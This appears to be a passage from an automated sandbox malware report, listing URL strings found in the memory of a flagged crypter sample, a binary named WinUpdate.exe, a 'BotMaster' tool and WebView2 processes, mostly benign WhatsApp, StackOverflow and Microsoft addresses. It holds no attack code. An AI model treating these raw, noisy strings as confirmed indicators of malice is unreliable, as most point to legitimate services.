                  Source: msedgewebview2.exe, 0000001D.00000002.3713312387.00002DDC01618000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scontent.whatsapp.net/v/t39.8562-34/312201775_3436222206622878_5992065132121718104_n.png?ccb
                  Source: msedgewebview2.exe, 00000020.00000002.3659915456.00001B440040C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scontent.whatsapp.net/v/t39.8562-34/314953329_693432345387154_1215169011003584703_n.png?ccb=
                  Source: msedgewebview2.exe, 0000001D.00000003.2537282691.00002DDC00ED0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scontent.whatsapp.net/v/t39.8562-34/319083687_560355302533985_451317800534933863_n.png?ccb=1
                  Source: msedgewebview2.exe, 0000001D.00000003.2581084255.00002DDC01198000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scontent.whatsapp.net/v/t39.8562-34/323914620_1571722909934742_4947035793330347072_n.png?ccb
                  Source: msedgewebview2.exe, 00000020.00000002.3645731864.00001B44000F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scontent.whatsapp.net/v/t39.8562-34/327713084_566495871797259_1779906837439389762_n.png?ccb=
                  Source: msedgewebview2.exe, 0000001D.00000003.2434494801.00002DDC00ED0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scontent.whatsapp.net/v/t39.8562-34/329792464_534173148815054_3736500652022655929_n.png?ccb=
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://so.lenovo.com.cn
                  Source: msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssjj.4399.com/
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, 00000000.00000002.2053102955.0000000002A70000.00000004.08000000.00040000.00000000.sdmp, WinUpdate.exe, 0000000E.00000002.2159698585.00000000047B0000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 0000000E.00000002.2159698585.0000000004738000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 0000000E.00000002.2157680311.0000000003462000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 00000022.00000002.2353065439.0000000004109000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 00000022.00000002.2346424155.0000000002CDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: WinUpdate.exe, 00000022.00000002.2346424155.0000000002CDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, 00000000.00000002.2053102955.0000000002A70000.00000004.08000000.00040000.00000000.sdmp, WinUpdate.exe, 0000000E.00000002.2159698585.00000000047B0000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 0000000E.00000002.2159698585.0000000004738000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 00000022.00000002.2353065439.0000000004109000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://start.jword.jp/?fr=slc
                  Source: msedgewebview2.exe, 00000026.00000003.2426739799.00004B1800AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.whatsapp.net
                  Source: msedgewebview2.exe, 0000001D.00000002.3704676650.00002DDC00BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.whatsapp.net-
                  Source: msedgewebview2.exe, 0000001D.00000002.3709152708.00002DDC00F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.whatsapp.net/
                  Source: msedgewebview2.exe, 0000001D.00000002.3709152708.00002DDC00F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.whatsapp.net/rcR
                  Source: msedgewebview2.exe, 00000020.00000002.3657418818.00001B44002AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.whatsapp.net/rsrc.php/v3/y
                  Source: msedgewebview2.exe, 0000001D.00000002.3711643656.00002DDC011E8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3659915456.00001B440040C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.whatsapp.net/rsrc.php/v3/yH/r/FaKmSZnGIEy.js?_nc_x=Ij3Wp8lg5Kz
                  Source: msedgewebview2.exe, 00000020.00000002.3659915456.00001B440040C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.whatsapp.net/rsrc.php/v3/yH/r/FaKmSZnGIEy.js?_nc_x=Ij3Wp8lg5KzHo9E0IWMGQ2eVzO3JsgqkA&
                  Source: msedgewebview2.exe, 00000020.00000002.3660602441.00001B4400424000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.whatsapp.net/rsrc.php/v3/yI/l/0
                  Source: msedgewebview2.exe, 0000001D.00000002.3712703856.00002DDC01558000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3659915456.00001B440040C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.whatsapp.net/rsrc.php/v3/yZ/r/yiagt1v2zqJ.js?_nc_x=Ij3Wp8lg5Kz
                  Source: msedgewebview2.exe, 00000020.00000002.3659915456.00001B440040C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.whatsapp.net/rsrc.php/v3/yZ/r/yiagt1v2zqJ.js?_nc_x=Ij3Wp8lg5KzSlOBCj9NpgYdrONdtBH79cg
                  Source: msedgewebview2.exe, 00000020.00000002.3660602441.00001B4400424000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.whatsapp.net/rsrc.php/v3/yb/l/0
                  Source: msedgewebview2.exe, 00000020.00000002.3660602441.00001B4400424000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.whatsapp.net/rsrc.php/v3/ym/r/O-z1wbECBVC.js?_nc_x=Ij3Wp8lg5Kz
                  Source: msedgewebview2.exe, 00000020.00000002.3660602441.00001B4400424000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.whatsapp.net/rsrc.php/v3/ym/r/O-z1wbECBVC.js?_nc_x=Ij3Wp8lg5Kz7
                  Source: msedgewebview2.exe, 0000001D.00000002.3708840845.00002DDC00F6C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393461202.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.whatsapp.net/rsrc.php/v3/yr/r/_ElV2y1OxOx.js?_nc_x=Ij3Wp8lg5Kz
                  Source: msedgewebview2.exe, 0000001D.00000002.3708200458.00002DDC00EF4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3683468474.0000021F34D30000.00000002.00000001.00040000.0000004E.sdmp, msedgewebview2.exe, 0000001D.00000002.3712090040.00002DDC014E0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3711231440.00002DDC01164000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.whatsapp.net/rsrc.php/v3/yz/r/ujTY9i_Jhs1.png
                  Source: msedgewebview2.exe, 0000001D.00000002.3711231440.00002DDC01164000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.whatsapp.net/rsrc.php/v3/yz/r/ujTY9i_Jhs1.png-
                  Source: msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.whatsapp.net/rsrc.php/v3/yz/r/ujTY9i_Jhs1.pngB
                  Source: msedgewebview2.exe, 0000001D.00000002.3683468474.0000021F34D30000.00000002.00000001.00040000.0000004E.sdmpString found in binary or memory: https://static.whatsapp.net/rsrc.php/v3/yz/r/ujTY9i_Jhs1.pngN
                  Source: msedgewebview2.exe, 0000001D.00000002.3697899904.00002DDC00720000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.whatsapp.net/rsrc.php/v3/yz/r/ujTY9i_Jhs1.pngch
                  Source: msedgewebview2.exe, 0000001D.00000002.3690058561.00002DDC0001C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3659915456.00001B440040C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.whatsapp.net/rsrc.php/v3i7M54/y4/l/en_US/8csXZcJFpSu.js?_nc_x=Ij3Wp8lg5Kz
                  Source: msedgewebview2.exe, 00000020.00000002.3660602441.00001B4400424000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.whatsapp.net/rsrc.php/v3ihVQ4/y5/l/en_US/HalbLyIrdwA.js?_nc_x=Ij3Wp8lg5Kz
                  Source: msedgewebview2.exe, 0000001D.00000003.2564433283.00002DDC01128000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564262880.00002DDC00C70000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566414130.00002DDC011D8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2365404102.00002DDC01148000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2362928346.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2362700408.00002DDC01104000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2567021699.00002DDC0150C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2365366959.00002DDC006B4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2420175454.00002DDC00B55000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566304427.00002DDC01548000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2570283052.00002DDC01234000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564490059.00002DDC01138000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2549634681.00001B440043C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2573925253.00001B440044D000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395284363.00001B4400444000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2551397552.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2552719085.00001B4400ADC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2551228011.00001B4400120000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570850324.00001B4400438000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2550537451.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393955066.00001B4400438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.whatsapp.net91
                  Source: msedgewebview2.exe, 00000026.00000003.2426739799.00004B1800AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.whatsapp.net;connect-src
                  Source: msedgewebview2.exe, 0000001D.00000002.3704676650.00002DDC00BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.whatsapp.netGL_AMD_performance_monitor
                  Source: msedgewebview2.exe, 0000001D.00000002.3693669592.00002DDC00254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sts.windows-ppe.net/
                  Source: msedgewebview2.exe, 0000001D.00000002.3693669592.00002DDC00254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sts.windows.net/
                  Source: msedgewebview2.exe, 00000026.00000003.2529580323.00004B180119C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.jio/.
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tg.602.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tj.xyhvip.cn
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2196945337.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7617)
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tp.9377s.com
                  Source: msedgewebview2.exe, 0000001D.00000003.2545594567.00002DDC0123C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
                  Source: msedgewebview2.exe, 0000001D.00000003.2436721589.0000021F32A4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unitedstates1.ss170540185939602997400506234197983529371
                  Source: msedgewebview2.exe, 0000001D.00000003.2545594567.00002DDC0123C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
                  Source: msedgewebview2.exe, 0000001D.00000002.3666330599.0000021F32A7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/-
                  Source: msedgewebview2.exe, 0000001D.00000003.2482475578.0000021F32A54000.00000004.00000020.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3664587613.0000021F32A64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/J
                  Source: msedgewebview2.exe, 0000001D.00000003.2545594567.00002DDC0123C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
                  Source: BotMaster.exe, 0000001A.00000002.3650326936.0000000003601000.00000004.00000800.00020000.00000000.sdmp, BotMaster.exe, 0000001A.00000000.2266898531.0000000000DA2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://wa.me/
                  Source: BotMaster.exe, 0000001A.00000002.3650326936.0000000003601000.00000004.00000800.00020000.00000000.sdmp, BotMaster.exe, 0000001A.00000000.2266898531.0000000000DA2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://wa.me/9
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.sogou.com/?
                  Source: msedgewebview2.exe, 0000001D.00000002.3693389331.00002DDC00228000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3707967692.00002DDC00EC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.what
                  Source: msedgewebview2.exe, 0000001D.00000002.3693389331.00002DDC00228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.what/
                  Source: msedgewebview2.exe, 00000020.00000002.3644902662.00001B44000D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.c
                  Source: msedgewebview2.exe, 00000023.00000002.3657476152.00007AAC000C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com
                  Source: msedgewebview2.exe, 00000023.00000002.3657476152.00007AAC000C1000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2376132140.00004B18009E0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2371529987.00004B18009D4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2375408220.00004B1800AEC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2435742291.00004B1800AE4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2376075947.00004B18009EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/
                  Source: msedgewebview2.exe, 0000001D.00000002.3710558506.00002DDC010B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/(
                  Source: msedgewebview2.exe, 0000001D.00000002.3711643656.00002DDC011E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/-
                  Source: msedgewebview2.exe, 0000001D.00000002.3697700005.00002DDC00708000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/0
                  Source: msedgewebview2.exe, 0000001D.00000002.3696975013.00002DDC006D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/6m
                  Source: msedgewebview2.exe, 00000020.00000002.3658633455.00001B44003B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/7D
                  Source: msedgewebview2.exe, 0000001D.00000002.3709467420.00002DDC00FD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/89bffb5f88
                  Source: msedgewebview2.exe, 0000001D.00000002.3700547825.00002DDC0088C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/C
                  Source: msedgewebview2.exe, 0000001D.00000003.2436721589.0000021F32A4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/EBW
                  Source: msedgewebview2.exe, 00000020.00000003.2568867078.00001B44003B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2372778488.00001B44003B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/Entry
                  Source: msedgewebview2.exe, 00000020.00000003.2568867078.00001B44003B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/UfD
                  Source: msedgewebview2.exe, 00000020.00000002.3642612950.00001B4400060000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/WAWebWorker.b49cbf3740869c417a45.worker.js
                  Source: msedgewebview2.exe, 00000020.00000003.2622810618.00001B4400804000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/WAWebWorker.b49cbf3740869c417a45.worker.js.map
                  Source: msedgewebview2.exe, 0000001D.00000002.3696682799.00002DDC0068C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3662559545.0000021F32833000.00000002.00000001.00040000.00000032.sdmpString found in binary or memory: https://web.whatsapp.com/WhatsApp
                  Source: msedgewebview2.exe, 0000001D.00000002.3696682799.00002DDC0068C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3662559545.0000021F32833000.00000002.00000001.00040000.00000032.sdmpString found in binary or memory: https://web.whatsapp.com/WhatsApp/q
                  Source: msedgewebview2.exe, 0000001D.00000002.3705771908.00002DDC00D14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/Z
                  Source: msedgewebview2.exe, 0000001D.00000002.3705771908.00002DDC00D14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/_
                  Source: msedgewebview2.exe, 0000001D.00000002.3710912909.00002DDC010F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/a2b63acrd
                  Source: msedgewebview2.exe, 00000020.00000003.2417471518.00001B4400468000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3645362181.00001B44000E9000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2598410666.00001B4400468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/accept-encodinggzip
                  Source: msedgewebview2.exe, 00000020.00000003.2479218149.00001B44005E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/app.febe97f47327a63e0d22.js
                  Source: msedgewebview2.exe, 00000020.00000003.2476969681.00001B4400804000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2512508499.00004B180304C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2501704874.00004B1803034000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2522597921.00004B1802AEC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2502507171.00004B1803044000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/app.febe97f47327a63e0d22.js.map
                  Source: msedgewebview2.exe, 0000001D.00000002.3714060448.00002DDC016CF000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3692759678.00002DDC001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/app.febe97f47327a63e0d22.js:314:1232709
                  Source: msedgewebview2.exe, 0000001D.00000002.3692325076.00002DDC00174000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3710558506.00002DDC010B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/apple-touch-icon.png
                  Source: msedgewebview2.exe, 0000001D.00000002.3702072169.00002DDC00958000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/apple-touch-icon.pngy
                  Source: msedgewebview2.exe, 0000001D.00000002.3705771908.00002DDC00D14000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2372778488.00001B44003B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/ar
                  Source: msedgewebview2.exe, 0000001D.00000002.3711309571.00002DDC01178000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/atorOnPMSequence
                  Source: msedgewebview2.exe, 0000001D.00000002.3711643656.00002DDC011E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/atorOnPMSequenceify11738A7F178B069BFADF281F7A077562~
                  Source: msedgewebview2.exe, 00000020.00000002.3660602441.00001B4400424000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/check-update?version=2.2410.1&platform=web
                  Source: msedgewebview2.exe, 00000020.00000002.3660602441.00001B4400424000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/check-update?version=2.2410.1&platform=web?_nc_x=Ij3Wp8lg5Kz
                  Source: msedgewebview2.exe, 0000001D.00000002.3709467420.00002DDC00FD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3710558506.00002DDC010B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/dows/newsbar
                  Source: msedgewebview2.exe, 00000020.00000003.2596189273.00001B4400804000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2513975841.00004B180480E000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2531918474.00004B180120C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2532384549.00004B1801210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/emoji/v1
                  Source: msedgewebview2.exe, 00000020.00000003.2573774426.00001B4400530000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/emoji_suggestions/en.json?v=2.2410.1
                  Source: msedgewebview2.exe, 00000020.00000002.3648170740.00001B440016C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/emoji_suggestions/en.json?v=2.2410.100
                  Source: msedgewebview2.exe, 0000001D.00000002.3710558506.00002DDC010B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/enerPolicy
                  Source: msedgewebview2.exe, 0000001D.00000002.3693954084.00002DDC00298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/enerPolicyime
                  Source: msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/entry
                  Source: msedgewebview2.exe, 0000001D.00000003.2562900302.00002DDC00CBC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3648242608.00001B4400178000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/img/favicon/1x/favicon.png
                  Source: msedgewebview2.exe, 0000001D.00000002.3683468474.0000021F34D30000.00000002.00000001.00040000.0000004E.sdmp, msedgewebview2.exe, 0000001D.00000002.3709381754.00002DDC00FB0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712090040.00002DDC014E0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3704505743.00002DDC00B64000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3660602441.00001B4400424000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/img/favicon_c5088e888c97ad440a61d247596f88e5.png
                  Source: msedgewebview2.exe, 00000020.00000002.3660602441.00001B4400424000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/img/favicon_c5088e888c97ad440a61d247596f88e5.png45.47
                  Source: msedgewebview2.exe, 0000001D.00000002.3683468474.0000021F34D30000.00000002.00000001.00040000.0000004E.sdmpString found in binary or memory: https://web.whatsapp.com/img/favicon_c5088e888c97ad440a61d247596f88e5.png9
                  Source: msedgewebview2.exe, 0000001D.00000002.3704505743.00002DDC00B64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/img/favicon_c5088e888c97ad440a61d247596f88e5.pnggetElementsByClassName(
                  Source: msedgewebview2.exe, 0000001D.00000002.3690058561.00002DDC0001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/img/favicon_c5088e888c97ad440a61d247596f88e5.pnggo
                  Source: msedgewebview2.exe, 00000020.00000002.3642939068.00001B4400070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/killswitch/
                  Source: msedgewebview2.exe, 00000020.00000002.3642939068.00001B4400070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/killswitch/EY(key))
                  Source: msedgewebview2.exe, 00000020.00000003.2549634681.00001B4400444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/killswitch/https://web.whatsapp.com/killswitch/
                  Source: msedgewebview2.exe, 0000001D.00000002.3705771908.00002DDC00D14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/l
                  Source: msedgewebview2.exe, 00000020.00000002.3647474243.00001B4400130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/libsignal-protocol-ee5b8ba.min.js
                  Source: msedgewebview2.exe, 00000020.00000003.2573774426.00001B4400530000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/main.3d4bb07beea083ab8b3a.js
                  Source: msedgewebview2.exe, 00000020.00000003.2573264356.00001B4400C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/main.3d4bb07beea083ab8b3a.js.map
                  Source: msedgewebview2.exe, 0000001D.00000002.3704676650.00002DDC00BBC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3648242608.00001B4400178000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/main~.f4046bd714178dbbb8c1.js
                  Source: msedgewebview2.exe, 00000020.00000003.2551681614.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/main~.f4046bd714178dbbb8c1.js.map
                  Source: msedgewebview2.exe, 0000001D.00000002.3704505743.00002DDC00B64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/manifest.json
                  Source: msedgewebview2.exe, 0000001D.00000002.3712036578.00002DDC014D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/moment_locales/en-GB.1a0883d124f255e1ccfa.js
                  Source: msedgewebview2.exe, 0000001D.00000002.3710912909.00002DDC010F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/nOpenerPolicy
                  Source: msedgewebview2.exe, 0000001D.00000002.3696502178.00002DDC0063C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/omT
                  Source: msedgewebview2.exe, 00000020.00000003.2570542880.00001B4400444000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2549634681.00001B4400444000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2417800119.00001B4400444000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2565475430.00001B4400444000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2551019821.00001B4400444000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2573024744.00001B4400444000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2424379925.00001B4400444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/p
